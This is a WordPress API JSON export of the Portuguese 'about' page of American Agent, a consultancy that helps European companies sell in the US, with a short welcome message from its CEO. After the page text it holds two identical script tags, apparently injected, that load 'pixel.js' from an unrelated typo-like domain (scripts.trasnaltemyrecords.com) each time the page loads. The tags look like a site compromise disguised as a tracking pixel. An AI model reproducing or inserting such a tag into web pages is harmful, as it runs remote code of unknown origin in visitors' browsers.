{"id":3441,"date":"2014-08-30T08:16:10","date_gmt":"2014-08-30T12:16:10","guid":{"rendered":"https:\/\/americanagent.com\/about-2\/"},"modified":"2014-09-08T14:27:44","modified_gmt":"2014-09-08T18:27:44","slug":"a-empresa","status":"publish","type":"page","link":"https:\/\/americanagent.com\/pt-br\/a-empresa\/","title":{"rendered":"A EMPRESA"},"content":{"rendered":"<div  class='flex_column av-av_one_third-2a9015ff38129c418a3f2eafba3e9512 av_one_third  avia-builder-el-0  el_before_av_two_third  avia-builder-el-first  first flex_column_div  '     ><style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-av_image-f44a9eb16435c1126891c37ced8a4e6b\">\n.avia-image-container.av-av_image-f44a9eb16435c1126891c37ced8a4e6b img.avia_image{\nbox-shadow:none;\n}\n.avia-image-container.av-av_image-f44a9eb16435c1126891c37ced8a4e6b .av-image-caption-overlay-center{\ncolor:#ffffff;\n}\n<\/style>\n<div  class='avia-image-container av-av_image-f44a9eb16435c1126891c37ced8a4e6b av-styling- avia_animated_image av-animated-when-visible-95 top-to-bottom avia-align-center  avia-builder-el-1  avia-builder-el-no-sibling '   itemprop=\"image\" itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/ImageObject\" ><div class=\"avia-image-container-inner\"><div class=\"avia-image-overlay-wrap\"><img decoding=\"async\" fetchpriority=\"high\" class='wp-image-4027 avia-img-lazy-loading-not-4027 avia_image ' src=\"https:\/\/americanagent.com\/wp-content\/uploads\/2014\/08\/about.jpg\" alt='' title='about'  height=\"2592\" width=\"2022\"  itemprop=\"thumbnailUrl\" srcset=\"https:\/\/americanagent.com\/wp-content\/uploads\/2014\/08\/about.jpg 2022w, https:\/\/americanagent.com\/wp-content\/uploads\/2014\/08\/about-234x300.jpg 234w, https:\/\/americanagent.com\/wp-content\/uploads\/2014\/08\/about-803x1030.jpg 803w, https:\/\/americanagent.com\/wp-content\/uploads\/2014\/08\/about-1170x1500.jpg 1170w, https:\/\/americanagent.com\/wp-content\/uploads\/2014\/08\/about-549x705.jpg 549w, https:\/\/americanagent.com\/wp-content\/uploads\/2014\/08\/about-450x576.jpg 450w\" sizes=\"(max-width: 2022px) 100vw, 2022px\" \/><\/div><\/div><\/div><\/div><div  class='flex_column av-av_two_third-93a81277e5006bb2348109df4de0b554 av_two_third  avia-builder-el-2  el_after_av_one_third  avia-builder-el-last  flex_column_div  '     ><section  class='av_textblock_section av-av_textblock-6b22bd10f6a80d1d633ec96f97f4768a '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock'  itemprop=\"text\" ><p><span class='av_dropcap1 av-av_dropcap1-3cd9da5fea0ef5fb27aee617571c39a3'><span style=\"color: #000000;\">D<\/span><\/span>esde 2002 que temos vindo a ajudar as empresas europeias na abordagem ao mercado dos EUA com as mais fortes poss\u00edveis estrat\u00e9gias de vendas. Independente do servi\u00e7o que estamos a proporcionar para os nossos clientes, o nosso objectivo \u00e9 conseguir sempre a melhor configura\u00e7\u00e3o poss\u00edvel de vendas para a sua presen\u00e7a no mercado dos EUA.<\/p>\n<p>Ind\u00fastria ampla, as empresas americanas que compram modelos mudaram bastante drasticamente durante os \u00faltimos anos &#8211; Se quiser atacar o mercado norte-americano, \u00e9 melhor ter um plano s\u00f3lido e estar disposto a considerar algumas novas estrat\u00e9gias.<\/p>\n<p>Gostaria de convidar pessoalmente o seu contacto, apresente o seu neg\u00f3cio e conte-nos sobre as suas necessidades aqui nos EUA, com certeza, podemos avan\u00e7ar com ideias para a sua considera\u00e7\u00e3o.<\/p>\n<p>Cumprimentos<\/p>\n<p><strong>Mr. Kari Koivuniemi<\/strong><\/p>\n<p><strong>Fundaror e CEO<\/strong><\/p>\n<\/div><\/section><\/div><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"class_list":["post-3441","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>A EMPRESA - American Agent - USA Sales Services and Distributor Search Services<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/americanagent.com\/pt-br\/a-empresa\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"A EMPRESA - American Agent - USA Sales Services and Distributor Search Services\" \/>\n<meta property=\"og:url\" content=\"https:\/\/americanagent.com\/pt-br\/a-empresa\/\" \/>\n<meta property=\"og:site_name\" content=\"American Agent - USA Sales Services and Distributor Search Services\" \/>\n<meta property=\"article:modified_time\" content=\"2014-09-08T18:27:44+00:00\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/pt-br\\\/a-empresa\\\/\",\"url\":\"https:\\\/\\\/americanagent.com\\\/pt-br\\\/a-empresa\\\/\",\"name\":\"A EMPRESA - American Agent - USA Sales Services and Distributor Search Services\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/pt-br\\\/#website\"},\"datePublished\":\"2014-08-30T12:16:10+00:00\",\"dateModified\":\"2014-09-08T18:27:44+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/pt-br\\\/a-empresa\\\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/americanagent.com\\\/pt-br\\\/a-empresa\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/pt-br\\\/a-empresa\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/americanagent.com\\\/pt-br\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"A EMPRESA\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/pt-br\\\/#website\",\"url\":\"https:\\\/\\\/americanagent.com\\\/pt-br\\\/\",\"name\":\"American Agent - USA Sales Services and Distributor Search Services\",\"description\":\"USA Sales services and Distributor, Importer and Reseller Search services.\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/americanagent.com\\\/pt-br\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"A EMPRESA - American Agent - USA Sales Services and Distributor Search Services","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/americanagent.com\/pt-br\/a-empresa\/","og_locale":"pt_BR","og_type":"article","og_title":"A EMPRESA - American Agent - USA Sales Services and Distributor Search Services","og_url":"https:\/\/americanagent.com\/pt-br\/a-empresa\/","og_site_name":"American Agent - USA Sales Services and Distributor Search Services","article_modified_time":"2014-09-08T18:27:44+00:00","twitter_misc":{"Est. reading time":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/americanagent.com\/pt-br\/a-empresa\/","url":"https:\/\/americanagent.com\/pt-br\/a-empresa\/","name":"A EMPRESA - American Agent - USA Sales Services and Distributor Search Services","isPartOf":{"@id":"https:\/\/americanagent.com\/pt-br\/#website"},"datePublished":"2014-08-30T12:16:10+00:00","dateModified":"2014-09-08T18:27:44+00:00","breadcrumb":{"@id":"https:\/\/americanagent.com\/pt-br\/a-empresa\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/americanagent.com\/pt-br\/a-empresa\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/americanagent.com\/pt-br\/a-empresa\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/americanagent.com\/pt-br\/"},{"@type":"ListItem","position":2,"name":"A EMPRESA"}]},{"@type":"WebSite","@id":"https:\/\/americanagent.com\/pt-br\/#website","url":"https:\/\/americanagent.com\/pt-br\/","name":"American Agent - USA Sales Services and Distributor Search Services","description":"USA Sales services and Distributor, Importer and Reseller Search services.","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/americanagent.com\/pt-br\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"}]}},"_links":{"self":[{"href":"https:\/\/americanagent.com\/pt-br\/wp-json\/wp\/v2\/pages\/3441","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/americanagent.com\/pt-br\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/americanagent.com\/pt-br\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/americanagent.com\/pt-br\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/americanagent.com\/pt-br\/wp-json\/wp\/v2\/comments?post=3441"}],"version-history":[{"count":0,"href":"https:\/\/americanagent.com\/pt-br\/wp-json\/wp\/v2\/pages\/3441\/revisions"}],"wp:attachment":[{"href":"https:\/\/americanagent.com\/pt-br\/wp-json\/wp\/v2\/media?parent=3441"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}